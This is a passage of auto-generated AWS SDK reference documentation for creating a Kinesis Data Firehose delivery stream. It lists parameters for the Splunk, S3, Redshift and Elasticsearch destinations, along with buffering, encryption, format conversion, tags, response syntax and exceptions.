SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. 
If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. 
This value is required if CloudWatch logging is enabled.\n\n\n\nVpcConfiguration (dict) --The details of the VPC of the Amazon ES destination.\n\nSubnetIds (list) -- [REQUIRED]The IDs of the subnets that you want Kinesis Data Firehose to use to create ENIs in the VPC of the Amazon ES destination. Make sure that the routing tables and inbound and outbound rules allow traffic to flow from the subnets whose IDs are specified here to the subnets that have the destination Amazon ES endpoints. Kinesis Data Firehose creates at least one ENI in each of the subnets that are specified here. Do not delete or modify these ENIs.\nThe number of ENIs that Kinesis Data Firehose creates in the subnets specified here scales up and down automatically based on throughput. To enable Kinesis Data Firehose to scale up the number of ENIs to match throughput, ensure that you have sufficient quota. To help you calculate the quota you need, assume that Kinesis Data Firehose can create up to three ENIs for this delivery stream for each of the subnets specified here. For more information about ENI quota, see Network Interfaces in the Amazon VPC Quotas topic.\n\n(string) --\n\n\nRoleARN (string) -- [REQUIRED]The ARN of the IAM role that you want the delivery stream to use to create endpoints in the destination VPC.\n\nSecurityGroupIds (list) -- [REQUIRED]The IDs of the security groups that you want Kinesis Data Firehose to use when it creates ENIs in the VPC of the Amazon ES destination.\n\n(string) --\n\n\n\n\n\n
:type SplunkDestinationConfiguration: dict
:param SplunkDestinationConfiguration: The destination in Splunk. You can specify only one destination.\n\nHECEndpoint (string) -- [REQUIRED]The HTTP Event Collector (HEC) endpoint to which Kinesis Data Firehose sends your data.\n\nHECEndpointType (string) -- [REQUIRED]This type can be either 'Raw' or 'Event.'\n\nHECToken (string) -- [REQUIRED]This is a GUID that you obtain from your Splunk cluster when you create a new HEC endpoint.\n\nHECAcknowledgmentTimeoutInSeconds (integer) --The amount of time that Kinesis Data Firehose waits to receive an acknowledgment from Splunk after it sends it data. At the end of the timeout period, Kinesis Data Firehose either tries to send the data again or considers it an error, based on your retry settings.\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver data to Splunk, or if it doesn\'t receive an acknowledgment of receipt from Splunk.\n\nDurationInSeconds (integer) --The total amount of time that Kinesis Data Firehose spends on retries. This duration starts after the initial attempt to send data to Splunk fails. It doesn\'t include the periods during which Kinesis Data Firehose waits for acknowledgment from Splunk after each attempt.\n\n\n\nS3BackupMode (string) --Defines how documents should be delivered to Amazon S3. When set to FailedDocumentsOnly , Kinesis Data Firehose writes any data that could not be indexed to the configured Amazon S3 destination. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents to Amazon S3. Default value is FailedDocumentsOnly .\n\nS3Configuration (dict) -- [REQUIRED]The configuration for the backup Amazon S3 location.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. 
For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. 
If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type Tags: list
:param Tags: A set of tags to assign to the delivery stream. A tag is a key-value pair that you can define and assign to AWS resources. Tags are metadata. For example, you can add friendly names and descriptions or other types of information that can help you distinguish the delivery stream. For more information about tags, see Using Cost Allocation Tags in the AWS Billing and Cost Management User Guide.\nYou can specify up to 50 tags when creating a delivery stream.\n\n(dict) --Metadata that you can assign to a delivery stream, consisting of a key-value pair.\n\nKey (string) -- [REQUIRED]A unique identifier for the tag. Maximum length: 128 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @\n\nValue (string) --An optional string, which you can use to describe or define the tag. Maximum length: 256 characters. Valid characters: Unicode letters, digits, white space, _ . / = + - % @\n\n\n\n\n
:rtype: dict
Returns: Response Syntax
{
'DeliveryStreamARN': 'string'
}
Response Structure
(dict) --
DeliveryStreamARN (string) --
The ARN of the delivery stream.
Exceptions
Firehose.Client.exceptions.InvalidArgumentException
Firehose.Client.exceptions.LimitExceededException
Firehose.Client.exceptions.ResourceInUseException
Firehose.Client.exceptions.InvalidKMSResourceException
:return: {
'DeliveryStreamARN': 'string'
}
:returns:
DeliveryStreamName (string) -- [REQUIRED]
The name of the delivery stream. This name must be unique per AWS account in the same AWS Region. If the delivery streams are in different accounts or different Regions, you can have multiple delivery streams with the same name.
DeliveryStreamType (string) -- The delivery stream type. This parameter can be one of the following values:
DirectPut : Provider applications access the delivery stream directly.
KinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.
KinesisStreamSourceConfiguration (dict) -- When a Kinesis data stream is used as the source for the delivery stream, a KinesisStreamSourceConfiguration containing the Kinesis data stream Amazon Resource Name (ARN) and the role ARN for the source stream.
KinesisStreamARN (string) -- [REQUIRED]The ARN of the source Kinesis data stream. For more information, see Amazon Kinesis Data Streams ARN Format .
RoleARN (string) -- [REQUIRED]The ARN of the role that provides access to the source Kinesis data stream. For more information, see AWS Identity and Access Management (IAM) ARN Format .
DeliveryStreamEncryptionConfigurationInput (dict) -- Used to specify the type and Amazon Resource Name (ARN) of the KMS key needed for Server-Side Encryption (SSE).
KeyARN (string) --If you set KeyType to CUSTOMER_MANAGED_CMK , you must specify the Amazon Resource Name (ARN) of the CMK. If you set KeyType to AWS_OWNED_CMK , Kinesis Data Firehose uses a service-account CMK.
KeyType (string) -- [REQUIRED]Indicates the type of customer master key (CMK) to use for encryption. The default setting is AWS_OWNED_CMK . For more information about CMKs, see Customer Master Keys (CMKs) . When you invoke CreateDeliveryStream or StartDeliveryStreamEncryption with KeyType set to CUSTOMER_MANAGED_CMK, Kinesis Data Firehose invokes the Amazon KMS operation CreateGrant to create a grant that allows the Kinesis Data Firehose service to use the customer managed CMK to perform encryption and decryption. Kinesis Data Firehose manages that grant.
When you invoke StartDeliveryStreamEncryption to change the CMK for a delivery stream that is encrypted with a customer managed CMK, Kinesis Data Firehose schedules the grant it had on the old CMK for retirement.
You can use a CMK of type CUSTOMER_MANAGED_CMK to encrypt up to 500 delivery streams. If a CreateDeliveryStream or StartDeliveryStreamEncryption operation exceeds this limit, Kinesis Data Firehose throws a LimitExceededException .
Warning
To encrypt your delivery stream, use symmetric CMKs. Kinesis Data Firehose doesn't support asymmetric CMKs. For information about symmetric and asymmetric CMKs, see About Symmetric and Asymmetric CMKs in the AWS Key Management Service developer guide.
S3DestinationConfiguration (dict) -- [Deprecated] The destination in Amazon S3. You can specify only one destination.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ExtendedS3DestinationConfiguration (dict) -- The destination in Amazon S3. You can specify only one destination.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --The data processing configuration.
Enabled (boolean) --Enables or disables data processing.
Processors (list) --The data processors.
(dict) --Describes a data processor.
Type (string) -- [REQUIRED]The type of processor.
Parameters (list) --The processor parameters.
(dict) --Describes the processor parameter.
ParameterName (string) -- [REQUIRED]The name of the parameter.
ParameterValue (string) -- [REQUIRED]The parameter value.
S3BackupMode (string) --The Amazon S3 backup mode.
S3BackupConfiguration (dict) --The configuration for backup in Amazon S3.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
DataFormatConversionConfiguration (dict) --The serializer, deserializer, and schema for converting data from the JSON format to the Parquet or ORC format before writing it to Amazon S3.
SchemaConfiguration (dict) --Specifies the AWS Glue Data Catalog table that contains the column information. This parameter is required if Enabled is set to true.
RoleARN (string) --The role that Kinesis Data Firehose can use to access AWS Glue. This role must be in the same account you use for Kinesis Data Firehose. Cross-account roles aren't allowed.
CatalogId (string) --The ID of the AWS Glue Data Catalog. If you don't supply this, the AWS account ID is used by default.
DatabaseName (string) --Specifies the name of the AWS Glue database that contains the schema for the output data.
TableName (string) --Specifies the AWS Glue table that contains the column information that constitutes your data schema.
Region (string) --If you don't specify an AWS Region, the default is the current Region.
VersionId (string) --Specifies the table version for the output data schema. If you don't specify this version ID, or if you set it to LATEST , Kinesis Data Firehose uses the most recent version. This means that any updates to the table are automatically picked up.
InputFormatConfiguration (dict) --Specifies the deserializer that you want Kinesis Data Firehose to use to convert the format of your data from JSON. This parameter is required if Enabled is set to true.
Deserializer (dict) --Specifies which deserializer to use. You can choose either the Apache Hive JSON SerDe or the OpenX JSON SerDe. If both are non-null, the server rejects the request.
OpenXJsonSerDe (dict) --The OpenX SerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the native Hive / HCatalog JsonSerDe.
ConvertDotsInJsonKeysToUnderscores (boolean) --When set to true , specifies that the names of the keys include dots and that you want Kinesis Data Firehose to replace them with underscores. This is useful because Apache Hive does not allow dots in column names. For example, if the JSON contains a key whose name is "a.b", you can define the column name to be "a_b" when using this option.
The default is false .
CaseInsensitive (boolean) --When set to true , which is the default, Kinesis Data Firehose converts JSON keys to lowercase before deserializing them.
ColumnToJsonKeyMappings (dict) --Maps column names to JSON keys that aren't identical to the column names. This is useful when the JSON contains keys that are Hive keywords. For example, timestamp is a Hive keyword. If you have a JSON key named timestamp , set this parameter to {"ts": "timestamp"} to map this key to a column named ts .
(string) --
(string) --
HiveJsonSerDe (dict) --The native Hive / HCatalog JsonSerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the OpenX SerDe.
TimestampFormats (list) --Indicates how you want Kinesis Data Firehose to parse the date and timestamps that may be present in your input data JSON. To specify these format strings, follow the pattern syntax of JodaTime's DateTimeFormat format strings. For more information, see Class DateTimeFormat . You can also use the special value millis to parse timestamps in epoch milliseconds. If you don't specify a format, Kinesis Data Firehose uses java.sql.Timestamp::valueOf by default.
(string) --
OutputFormatConfiguration (dict) --Specifies the serializer that you want Kinesis Data Firehose to use to convert the format of your data to the Parquet or ORC format. This parameter is required if Enabled is set to true.
Serializer (dict) --Specifies which serializer to use. You can choose either the ORC SerDe or the Parquet SerDe. If both are non-null, the server rejects the request.
ParquetSerDe (dict) --A serializer to use for converting data to the Parquet format before storing it in Amazon S3. For more information, see Apache Parquet .
BlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.
PageSizeBytes (integer) --The Parquet page size. Column chunks are divided into pages. A page is conceptually an indivisible unit (in terms of compression and encoding). The minimum value is 64 KiB and the default is 1 MiB.
Compression (string) --The compression code to use over data blocks. The possible values are UNCOMPRESSED , SNAPPY , and GZIP , with the default being SNAPPY . Use SNAPPY for higher decompression speed. Use GZIP if the compression ratio is more important than speed.
EnableDictionaryCompression (boolean) --Indicates whether to enable dictionary compression.
MaxPaddingBytes (integer) --The maximum amount of padding to apply. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 0.
WriterVersion (string) --Indicates the version of row format to output. The possible values are V1 and V2 . The default is V1 .
OrcSerDe (dict) --A serializer to use for converting data to the ORC format before storing it in Amazon S3. For more information, see Apache ORC .
StripeSizeBytes (integer) --The number of bytes in each stripe. The default is 64 MiB and the minimum is 8 MiB.
BlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.
RowIndexStride (integer) --The number of rows between index entries. The default is 10,000 and the minimum is 1,000.
EnablePadding (boolean) --Set this to true to indicate that you want stripes to be padded to the HDFS block boundaries. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is false .
PaddingTolerance (float) --A number between 0 and 1 that defines the tolerance for block padding as a decimal fraction of stripe size. The default value is 0.05, which means 5 percent of stripe size.
For the default values of 64 MiB ORC stripes and 256 MiB HDFS blocks, the default block padding tolerance of 5 percent reserves a maximum of 3.2 MiB for padding within the 256 MiB block. In such a case, if the available size within the block is more than 3.2 MiB, a new, smaller stripe is inserted to fit within that space. This ensures that no stripe crosses block boundaries and causes remote reads within a node-local task.
Kinesis Data Firehose ignores this parameter when OrcSerDe$EnablePadding is false .
Compression (string) --The compression code to use over data blocks. The default is SNAPPY .
BloomFilterColumns (list) --The column names for which you want Kinesis Data Firehose to create bloom filters. The default is null .
(string) --
BloomFilterFalsePositiveProbability (float) --The Bloom filter false positive probability (FPP). The lower the FPP, the bigger the Bloom filter. The default value is 0.05, the minimum is 0, and the maximum is 1.
DictionaryKeyThreshold (float) --Represents the fraction of the total number of non-null rows. To turn off dictionary encoding, set this fraction to a number that is less than the number of distinct keys in a dictionary. To always use dictionary encoding, set this threshold to 1.
FormatVersion (string) --The version of the file to write. The possible values are V0_11 and V0_12 . The default is V0_12 .
Enabled (boolean) --Defaults to true . Set it to false if you want to disable format conversion while preserving the configuration details.
RedshiftDestinationConfiguration (dict) -- The destination in Amazon Redshift. You can specify only one destination.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
ClusterJDBCURL (string) -- [REQUIRED]The database connection string.
CopyCommand (dict) -- [REQUIRED]The COPY command.
DataTableName (string) -- [REQUIRED]The name of the target table. The table must already exist in the database.
DataTableColumns (string) --A comma-separated list of column names.
CopyOptions (string) --Optional parameters to use with the Amazon Redshift COPY command. For more information, see the "Optional Parameters" section of Amazon Redshift COPY command . Some possible examples that would apply to Kinesis Data Firehose are as follows:
delimiter '\t' lzop; - fields are delimited with "\t" (TAB character) and compressed using lzop.delimiter '|' - fields are delimited with "|" (this is the default delimiter).
delimiter '|' escape - the delimiter should be escaped.
fixedwidth 'venueid:3,venuename:25,venuecity:12,venuestate:2,venueseats:6' - fields are fixed width in the source, with each width specified after every column in the table.
JSON 's3://mybucket/jsonpaths.txt' - data is in JSON format, and the path specified is the format of the data.
For more examples, see Amazon Redshift COPY command examples .
Username (string) -- [REQUIRED]The name of the user.
Password (string) -- [REQUIRED]The user password.
RetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon Redshift. Default value is 3600 (60 minutes).
DurationInSeconds (integer) --The length of time during which Kinesis Data Firehose retries delivery after a failure, starting from the initial request and including the first attempt. The default value is 3600 seconds (60 minutes). Kinesis Data Firehose does not retry if the value of DurationInSeconds is 0 (zero) or if the first delivery attempt takes longer than the current value.
S3Configuration (dict) -- [REQUIRED]The configuration for the intermediate Amazon S3 location from which Amazon Redshift obtains data. Restrictions are described in the topic for CreateDeliveryStream .
The compression formats SNAPPY or ZIP cannot be specified in RedshiftDestinationConfiguration.S3Configuration because the Amazon Redshift COPY operation that reads from the S3 bucket doesn't support these compression formats.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
Enabled (boolean) --Enables or disables CloudWatch logging.
LogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --The data processing configuration.
Enabled (boolean) --Enables or disables data processing.
Processors (list) --The data processors.
(dict) --Describes a data processor.
Type (string) -- [REQUIRED]The type of processor.
Parameters (list) --The processor parameters.
(dict) --Describes the processor parameter.
ParameterName (string) -- [REQUIRED]The name of the parameter.
ParameterValue (string) -- [REQUIRED]The parameter value.
S3BackupMode (string) --The Amazon S3 backup mode.
S3BackupConfiguration (dict) --The configuration for backup in Amazon S3.
RoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .
The compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.
EncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --The encryption key.
AWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.
